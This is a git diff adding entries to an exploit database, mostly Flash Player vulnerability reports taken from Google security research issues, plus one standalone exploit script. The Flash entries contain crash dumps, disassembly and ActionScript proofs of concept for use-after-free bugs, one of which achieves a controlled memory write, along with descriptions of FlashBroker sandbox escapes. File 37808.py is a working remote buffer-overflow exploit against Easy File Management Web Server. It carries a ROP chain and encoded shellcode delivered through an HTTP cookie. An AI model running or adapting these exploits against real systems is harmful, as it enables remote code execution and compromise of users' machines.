+2) The new Flash fuzzing collaboration between Mateusz, Chris, Ben.
+
+For 1), here are the details (there's also an attachment):
+
+---
+VULNERABILITY DETAILS
+
+This is a OOB read vulnerability when processing the SCRIPTDATASTRING object in Flv file.
+
+
+VERSION
+Chrome Version: 42.0.2311.135 
+Operating System: Windows 7
+
+REPRODUCTION CASE
+
+See attached file
+
+FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
+
+Type of crash: 
+Tab
+
+Crash State: 
+
+[WARNING:..\..\..\..\flash\platform\pepper\pep_module.cpp(63)] SANDBOXED
+(e38.c34): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000006 ebx=003ff0b0 ecx=000ff000 edx=05110000 esi=00000000 edi=00000000
+eip=63be351a esp=003ff06c ebp=003ff080 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll - 
+pepflashplayer!PPP_ShutdownBroker+0x162327:
+63be351a 0fb632          movzx   esi,byte ptr [edx]         ds:002b:05110000=??
+4:064> k
+ChildEBP RetAddr  
+WARNING: Stack unwind information not available. Following frames may be wrong.
+003ff080 63be379e pepflashplayer!PPP_ShutdownBroker+0x162327
+003ff0b4 63cfd02e pepflashplayer!PPP_ShutdownBroker+0x1625ab
+003ff0ec 63b3c609 pepflashplayer!PPP_ShutdownBroker+0x27be3b
+003ff13c 63cf6d58 pepflashplayer!PPP_ShutdownBroker+0xbb416
+003ff14c 63cf6fbc pepflashplayer!PPP_ShutdownBroker+0x275b65
+003ff35c 63d11691 pepflashplayer!PPP_ShutdownBroker+0x275dc9
+003ff368 63d116d6 pepflashplayer!PPP_ShutdownBroker+0x29049e
+003ff4b4 63d0d842 pepflashplayer!PPP_ShutdownBroker+0x2904e3
+003ff4fc 63cf99a3 pepflashplayer!PPP_ShutdownBroker+0x28c64f
+003ff550 63b94728 pepflashplayer!PPP_ShutdownBroker+0x2787b0
+003ff574 63ff0933 pepflashplayer!PPP_ShutdownBroker+0x113535
+00000000 00000000 pepflashplayer!PPP_ShutdownBroker+0x56f740
+---
+
+For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read).
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37862.zip
+
diff --git a/platforms/windows/dos/37875.txt b/platforms/windows/dos/37875.txt
new file mode 100755
index 000000000..fb1908dce
--- /dev/null
+++ b/platforms/windows/dos/37875.txt
@@ -0,0 +1,27 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The following crash was observed in Flash Player 17.0.0.188 on Windows:
+
+(81c.854): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
+eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0         nv up ei pl nz ac po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050216
+Flash32_17_0_0_188+0x18cb:
+07a218cb ff6004           jmp   dword ptr [eax+0x4] ds:0023:3739700a=????????
+
+- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
+
+- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
+
+- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
+
+- The test case minimizes to an 11-bit difference from the original sample file.
+
+- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37875.zip
+
+
diff --git a/platforms/windows/dos/37883.txt b/platforms/windows/dos/37883.txt
new file mode 100755
index 000000000..45e5e5ca7
--- /dev/null
+++ b/platforms/windows/dos/37883.txt
@@ -0,0 +1,131 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
+
+This is  Issue 457278  resurrected. Again.
+
+VERSION
+Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
+Operating System: [Windows 7 x64 SP1]
+
+REPRODUCTION CASE
+There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
+
+This is  Issue 457278  resurrected. Again.
+
+When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
+
+Flash 17.0.0.169 added a flag to mitigate  Issue 457278 
+.text:004D6F0B                 mov     esi, [esp+2Ch+var_C]
+.text:004D6F0F                 push    1               ; char
+.text:004D6F11                 mov     ecx, edi        ; int
+.text:004D6F13                 mov     byte ptr [esi+0Ch], 1   ; this flag was added
+.text:004D6F17                 call    xparseAS2Code
+.text:004D6F1C                 mov     byte ptr [esi+0Ch], 0
+
+Flash 18.0.0.160 added an other flag to mitigate  Issue 476926 
+.text:004D6E3E loc_4D6E3E:
+.text:004D6E3E                 cmp     byte ptr [ebp+0Ch], 0   ; this flag was added
+.text:004D6E42                 lea     eax, [ebp+0Ch]
+.text:004D6E45                 mov     [esp+2Ch+var_8], eax
+.text:004D6E49                 jz      short loc_4D6E58
+.text:004D6E4B                 mov     ecx, dword_E50A40
+.text:004D6E51                 call    sub_967730
+.text:004D6E58
+.text:004D6E58 loc_4D6E58:
+.text:004D6E58                 mov     byte ptr [eax], 1
+.text:004D6E5B                 jmp     short loc_4D6E65
+
+
+But they didn't figure it was possible to execute AS2 code a bit above in the function:
+.text:004D6E6F                 mov     eax, [ebp+0]
+.text:004D6E72                 push    0
+.text:004D6E74                 lea     edx, [esp+34h+var_14]
+.text:004D6E78                 push    edx
+.text:004D6E79                 mov     edx, [eax+14h]
+.text:004D6E7C                 mov     ecx, ebp
+.text:004D6E7E                 call    edx        ; return the filter name
+.text:004D6E80                 push    eax
+.text:004D6E81                 lea     eax, [esp+3Ch+var_10]
+.text:004D6E85                 push    eax
+.text:004D6E86                 mov     ecx, edi
+.text:004D6E88                 call    xcreateStringObject
+.text:004D6E8D                 mov     ebx, [esp+38h+arg_4]
+.text:004D6E91                 push    eax
+.text:004D6E92                 push    ecx
+.text:004D6E93                 mov     eax, esp
+.text:004D6E95                 mov     ecx, edi
+.text:004D6E97                 mov     [eax], ebx
+.text:004D6E99                 call    sub_420400  ; execute some AS2 with a custom __proto__ object
+
+For ex:
+var oob = {}
+oob.__proto__ = {}
+oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); 
+flash.filters = oob
+
+
+Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
+That should crash while dereferencing 0x41424344.
+
+Compile with Flash CS 5.5.
+
+
+***************************************************************************
+Content of FiltusPafusTer.fla
+
+import flash.filters.GlowFilter;
+
+var a1:Array = new Array()
+var a2:Array = new Array()
+for (i = 0; i<0x50/4;i++) {
+	a2[i] = 0x41424344
+}
+
+for (var i = 0; i<0x200;i++) {
+	var tf:TextFormat = new TextFormat()
+	a1[i] = tf
+}
+for (var i = 0; i<0x200;i++) {
+	a1[i].tabStops = a2
+}
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
+tfield.filters = [glowfilter]
+
+
+function f() {
+	for (var i = 0; i<0x20;i++) {
+		_global.a1[0x100+i*4].tabStops = [1,2,3,4]
+	}
+
+	_global.tfield.filters = []
+	for (var i = 0; i<0x200;i++) {
+		_global.a1[i].tabStops = a2
+	}
+	
+}
+
+_global.tfield = tfield
+_global.a1 = a1
+_global.a2 = a2
+
+var oob = {}
+oob.__proto__ = {}
+oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); 
+flash.filters = oob
+
+var a = tfield.filters
+
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37883.zip
+
diff --git a/platforms/windows/dos/37884.txt b/platforms/windows/dos/37884.txt
new file mode 100755
index 000000000..12ca62e54
--- /dev/null
+++ b/platforms/windows/dos/37884.txt
@@ -0,0 +1,115 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
+
+VULNERABILITY DETAILS
+Copy Paste of  Issue 480496 
+
+VERSION
+Chrome Version: N/A yet, Flash 18.0.0.203
+Operating System: [Win7 x64 SP1]
+
+REPRODUCTION CASE
+
+Flash 18.0.0.203 patched  Issue 480496  by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
+
+.text:004D71DA loc_4D71DA:
+.text:004D71DA                 and     ecx, 0FFFFFFF8h
+.text:004D71DD                 call    xAS2_getArrayLength
+.text:004D71E2                 test    eax, eax
+.text:004D71E4                 jle     short loc_4D725D
+.text:004D71E6                 mov     ecx, [esp+8+arg_C]
+.text:004D71EA                 mov     eax, [ecx+94h]
+.text:004D71F0                 test    eax, 0FFFFFFFEh
+.text:004D71F5                 jz      short loc_4D7200
+.text:004D71F7                 and     eax, 0FFFFFFFEh
+.text:004D71FA                 cmp     dword ptr [eax+28h], 0       ; here we check whether the object has been deleted or not
+.text:004D71FE                 jnz     short loc_4D720B
+.text:004D7200
+.text:004D7200 loc_4D7200:
+.text:004D7200                 mov     ecx, dword_E51A40
+.text:004D7206                 call    sub_968A00                   ; and in that case we suicide
+
+
+Unfortunately they forget to do that check after the second Array.length call:
+
+.text:004D721D loc_4D721D:
+.text:004D721D                 and     eax, 0FFFFFFF8h
+.text:004D7220                 push    edi
+.text:004D7221                 mov     edi, eax
+.text:004D7223                 mov     ecx, edi
+.text:004D7225                 xor     esi, esi
+.text:004D7227                 call    xAS2_getArrayLength       ; here we can still execute a script and delete the filters...
+.text:004D722C                 test    eax, eax
+.text:004D722E                 jle     short loc_4D725C
+
+Should crash that way:
+CPU Disasm
+Address   Hex dump          Command                                  Comments
+004CE27F    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
+004CE282    8942 04         MOV DWORD PTR DS:[EDX+4],EAX         ; write a pointer to 0x41424344
+004CE285    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
+004CE288    8950 08         MOV DWORD PTR DS:[EAX+8],EDX
+004CE28B    FF41 08         INC DWORD PTR DS:[ECX+8]
+004CE28E    8941 04         MOV DWORD PTR DS:[ECX+4],EAX
+004CE291    C2 0400         RETN 4
+004CE294    FF41 08         INC DWORD PTR DS:[ECX+8]
+
+
+***************************************************************************
+Content of flash_as2_filters_uaf_write4_poc.fla
+//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
+//It's because Flash CS5.5 does not allow naming a property with a numeral
+
+import flash.filters.GlowFilter;
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+var a1:Array = new Array()
+var a2:Array = new Array()
+for (i = 0; i<0x3F8/4;i++) {
+	a2[i] = 0x41424344
+}
+a2[3] = 0
+a2[0x324/4] = 0x41424344
+a2[0x324/4 + 1] = 0x41424344
+a2[0x324/4 + 2] = 0x41414143
+a2[0x324/4 + 3] = 0x41414100
+for (var i = 0; i<0x200;i++) {
+	var tf:TextFormat = new TextFormat()
+	a1[i] = tf
+}
+for (var i = 0; i<0x100;i++) {
+	a1[i].tabStops = a2
+}
+	a1[0xFF].tabStops = []
+
+function f() {
+
+	_global.mc.createTextField("tf",1,1,2,3,4)
+
+a1[0xFE].tabStops = []
+a1[0xFD].tabStops = []
+for (var i = 0x100; i<0x200;i++) {
+		_global.a1[i].tabStops = _global.a2
+	}
+}
+
+_global.mc = this
+_global.counter = 0
+_global.a1 = a1
+_global.a2 = a2
+
+var oCounter:Object = new Object()
+oCounter.valueOf = function () {
+	_global.counter += 1
+	if (_global.counter == 4) f()
+	return 10;
+}
+
+var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
+tfield.filters = o;
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37884.zip
+
diff --git a/platforms/windows/remote/37808.py b/platforms/windows/remote/37808.py
new file mode 100755
index 000000000..c42a67b46
--- /dev/null
+++ b/platforms/windows/remote/37808.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow 
+# Version:       5.6
+# Date:          2015-08-17
+# Author:        Tracy Turben (tracyturben@gmail.com)
+# Software Link: http://www.efssoft.com/
+# Tested on:     Win7x32-EN
+# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) 
+# Credits for vulnerability discovery:
+# superkojiman (http://www.exploit-db.com/exploits/33453/)
+
+
+from struct import pack
+import socket,sys
+import os
+  
+host="192.168.1.15"
+port=80
+  
+junk0 = "\x90" * 80
+ 
+
+# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] 
+# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
+# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
+call_edx=pack('<L',0x1001D8C8) 
+ 
+junk1="\x90" * 280
+ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
+ 
+# Since 0x00 would break the exploit needs to be crafted on the stack
+crafted_jmp_esp=pack('<L',0xA44162FB)
+ 
+test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
+ 
+kungfu=pack('<L',0x10022aac)  # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
+kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
+ 
+nopsled="\x90" * 20
+ 
+# windows/exec CMD=calc.exe 
+# Encoder: x86/shikata_ga_nai
+# powered by Metasploit 
+# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
+ 
+shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
+"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
+"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
+"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
+"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
+"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
+"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
+"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
+"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
+"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
+"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
+"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
+"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
+"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
+"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
+"\xa5\x59\x50")
+ 
+payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
+ 
+buf="GET /vfolder.ghp HTTP/1.1\r\n"
+buf+="User-Agent: Mozilla/4.0\r\n"
+buf+="Host:" + host + ":" + str(port) + "\r\n"
+buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buf+="Accept-Language: en-us\r\n"
+buf+="Accept-Encoding: gzip, deflate\r\n"
+buf+="Referer: http://" + host + "/\r\n"
+buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
+buf+="Conection: Keep-Alive\r\n\r\n"
+  
+print "[*] Connecting to Host " + host + "..."
+ 
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+    connect=s.connect((host, port))
+    print "[*] Connected to " + host + "!"
+except:
+    print "[!] " + host + " didn't respond\n"
+    sys.exit(0)
+     
+print "[*] Sending malformed request..."
+s.send(buf)
+ 
+print "[!] Exploit has been sent!\n"
+s.close()
diff --git a/platforms/windows/remote/37840.txt b/platforms/windows/remote/37840.txt
new file mode 100755
index 000000000..0ce41c1b4
--- /dev/null
+++ b/platforms/windows/remote/37840.txt
@@ -0,0 +1,17 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+FlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape
+
+1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
+
+FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
+
+There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers "\" as delimiter. If the destination includes "/", FlashBroker will use a wrong destination folder for check.
+
+The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
+
+2. Credit
+Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip
diff --git a/platforms/windows/remote/37841.txt b/platforms/windows/remote/37841.txt
new file mode 100755
index 000000000..9c53a55de
--- /dev/null
+++ b/platforms/windows/remote/37841.txt
@@ -0,0 +1,18 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+FlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape
+
+1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
+
+FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
+
+There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.
+
+The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
+
+2. Credit
+Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.
+
+Proof of Concept:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip
diff --git a/platforms/windows/remote/37842.txt b/platforms/windows/remote/37842.txt
new file mode 100755
index 000000000..a7b6614f5
--- /dev/null
+++ b/platforms/windows/remote/37842.txt
@@ -0,0 +1,16 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+FlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape
+
+1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
+
+FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
+
+There is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction.
+
+The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
+
+2. Credit
+Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37842.zip
\ No newline at end of file